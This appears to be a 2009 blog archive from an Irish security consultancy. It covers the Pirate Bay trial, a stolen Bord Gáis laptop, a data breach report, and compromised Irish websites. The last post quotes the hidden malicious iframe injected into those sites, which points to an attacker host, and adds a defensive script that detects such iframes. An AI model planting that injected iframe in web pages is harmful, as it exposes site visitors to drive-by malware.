Archive for June, 2009

The Pirate Bay is a Swedish website located in Stockholm, believed to be one of the world's largest sources for finding pirated software, pirated movies, pirated music, etc. The website was initially established in November 2003 by the Swedish anti-copyright organization Piratbyrån (The Piracy Bureau); it has been operating as a separate organization since October 2004. The Pirate Bay has been involved in a number of lawsuits, both as the plaintiff and as the defendant.

At the initial trial on the 17th of April 2009, four members of The Pirate Bay were found guilty of assistance to copyright infringement and sentenced to one year in prison and payment of a fine of 30 million kronor (about 2,684,000 euro) to a handful of entertainment companies, including Sony Music Entertainment, Warner Bros, EMI and Columbia Pictures.

During the trial the prosecution attempted to show the Pirate Bay as an immensely profitable business that made its money helping others violate copyright law. The defence attempted to show the Pirate Bay as nothing more than a search engine, no different from Google. But as we all know, Google is a search engine that is free for us to use when searching for information on the web, whereas The Pirate Bay was a website for finding illegal software and its use was not entirely free, so there is no comparison between The Pirate Bay and a search engine like Google. After the trial it was claimed that the judge was involved in pro-copyright lobby groups. Because of these connections the lawyers of the Pirate Bay defendants called for a retrial, arguing that the judge was not as objective as he should have been.

On the 23rd of June 2009 a Swedish appellate court ruled Thursday that there would be no retrial in the Pirate Bay case. The Appeal Court ruled that the judge in the initial trial was not biased. Although he was indeed a member of organizations that preserve the interests of copyright holders, this had not influenced his judgment.

Despite the convictions and court action, The Pirate Bay, with more than 30 million users, keeps operating as usual. So will there be further action to take this website offline, or what is the next step?

Encryption does not stop a hacker from gaining access to data stored on computers; it only makes it difficult and time consuming for the hacker to gain access to the data.

From reading the article in the Irish Times “Stolen Laptops from Bord Gáis”, I have the following concerns, because the picture painted by this story does not look right.

“Stolen laptop containing the account details of 75,000 customers”. Why would a single laptop contain the details of so many customers? In all large organisations customer data is kept in databases located in a secure data centre. So there is something wrong if the confidential details of 75,000 customers were stored on a single laptop. Any experienced IT Security person reading this article in the Irish Times would question the policies and procedures for data management at Bord Gáis.

“The affected customers have been warned to monitor their bank accounts for suspicious transactions”. So not only do we have customer details gone missing, but we also have bank account details of the customers.
What is this type of data doing on a laptop?
This type of data should never be stored on a laptop; it should be stored in a secure database located in a secure data centre.

The question that I have not heard any news person ask is: why were the details of 75,000 customers stored on a single laptop?
Does this mean that other laptops in Bord Gáis also contain this type of info?
Does Bord Gáis not have a secure data centre for storing this type of data?

“Mr Bunworth said that while the machine was not encrypted, the data saved on it could only be accessed using a username and password.” To an experienced hacker, cracking passwords is normally not difficult; even for a novice there are so many tools freely available on the internet to crack passwords. The days of usernames and passwords being considered strong security are long gone, and they have been replaced with two-factor authentication.

The article in the Irish Times that I am referring to is:

http://www.irishtimes.com/newspaper/breaking/2009/0618/breaking29.html

Verizon Business 2009 Data Breach Investigations Report (April 14 & 16, 2009)
According to the Verizon Business 2009 Data Breach Investigations Report, the number of records compromised in the breaches it examined in the last year is greater than the totals of the four previous years combined. Of those breaches detailed in the report, 90 percent have ties to organized crime rings. Only one third of the incidents Verizon investigated were publicly disclosed. Attacks now target personal identification numbers (PINs) along with other payment card account information. Eighty-seven percent of the security breaches occurred on systems that were not compliant with the Payment Card Industry Data Security Standard (PCI DSS) at the time of the incident. Approximately 75 percent of the breaches investigated were launched from external sources.

Internet Storm Center: http://isc.sans.org/diary.html?storyid=6202

http://www.securityfocus.com/brief/947

http://fcw.com/Articles/2009/04/16/Verizon-Organized-crime-behind-data-breaches.aspx

http://www.theregister.co.uk/2009/04/16/pin_security_breach_survey/

http://www.washingtonpost.com/wp-dyn/content/article/2009/04/15/AR2009041501196_pf.html

http://blog.wired.com/27bstroke6/2009/04/pins.html

http://www.verizonbusiness.com/resources/security/reports/2009_databreach_rp.pdf

At “Security I Trust” we have noticed a large increase in the number of Irish websites that are being compromised by hackers. In the majority of cases the hackers have only inserted code into the home page of a website. Many Irish website owners have been completely unaware that their website has been compromised, and they only found out when their PC was already affected.

The following code has recently been appearing on the homepage of many Irish websites:

<html><body><iframe src="http://tvnameshop.cn:8080/ts/in.cgi?pepsi19" width=12 height=12 style="visibility: hidden"></iframe></body></html>

The above iframe's URL uses a “.cn” extension to make you think that it is a Chinese hacking group, but from our investigation we have traced this link to a server located in Germany. This German server appears to reroute the connection to a server located in the Czech Republic.

What can website owners do?

If website owners are concerned about their website being a victim, they can open their web pages in a web browser and search for any iframe code, or for a tvnameshop.cn or fuckingl33t.eu reference. If you do not understand web code, you are advised to ask a web programmer to assist you. To repair your website you need to remove the code that the hackers have added to your website.
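The check described above can be automated. The following Python sketch is an added example, not code from the original post: it flags any iframe that points off-site, uses a non-standard port, is hidden by CSS or is only a few pixels in size, which generalizes the search beyond the two domain names. The site host `example.ie` and the 16-pixel threshold are assumptions chosen for illustration.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

HIDING_CSS = re.compile(r"visibility\s*:\s*hidden|display\s*:\s*none", re.I)
PIXELS = re.compile(r"\s*(\d+)\s*(?:px)?\s*", re.I)
TINY_PX = 16  # assumed threshold: a frame this small is not meant to be seen

class IframeAuditor(HTMLParser):
    """Records each <iframe> with the reasons it deserves a closer look."""
    def __init__(self, site_host):
        super().__init__()
        self.site_host = site_host.lower()  # the owner's own domain (assumption)
        self.findings = []  # (line number, src, [reasons])

    def handle_starttag(self, tag, attrs):
        if tag != "iframe":
            return
        attr = {name: value or "" for name, value in attrs}
        src, reasons = attr.get("src", ""), []
        try:
            url = urlparse(src)
            host, port = (url.hostname or "").lower(), url.port
        except ValueError:  # malformed authority, e.g. a bad port or IPv6 literal
            host, port, reasons = "", None, ["unparseable src"]
        if host and host != self.site_host and not host.endswith("." + self.site_host):
            reasons.append("off-site host " + host)
        if port not in (None, 80, 443):
            reasons.append("non-standard port %d" % port)
        if HIDING_CSS.search(attr.get("style", "")):
            reasons.append("hidden by CSS")
        for dim in ("width", "height"):
            size = PIXELS.fullmatch(attr.get(dim, ""))
            if size and int(size.group(1)) <= TINY_PX:
                reasons.append("tiny %s %s" % (dim, size.group(1)))
        self.findings.append((self.getpos()[0], src, reasons))

def audit_page(html, site_host):
    """Return only the iframes that triggered at least one reason."""
    auditor = IframeAuditor(site_host)
    auditor.feed(html)
    auditor.close()
    return [finding for finding in auditor.findings if finding[2]]

# Constructed sample: one legitimate on-site frame plus the injected snippet quoted above.
SAMPLE_PAGE = """<html><body>
<iframe src="/map.html" width="400" height="300"></iframe>
<iframe src="http://tvnameshop.cn:8080/ts/in.cgi?pepsi19" width=12 height=12 style="visibility: hidden"></iframe>
</body></html>"""
```

Calling `audit_page(SAMPLE_PAGE, "example.ie")` reports only the second frame. An off-site frame on its own can be a legitimate embed, so each finding is a prompt for review rather than proof of compromise.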

So what are these hackers doing?

When your customers come to your website it will appear normal, but in the background, when your homepage loads in the browser of the person viewing your website, the hacker's hidden code will also make a connection out to the hacker's server and run several hidden scripts against the user's PC. These hidden scripts could be used to steal information from the user's PC or even install malware or other tools on your PC. The primary danger for the website owner is that it will appear as if his website was responsible for the attack against the user.

Niall O’Farrell
Managing Director
www.securityitrust.com
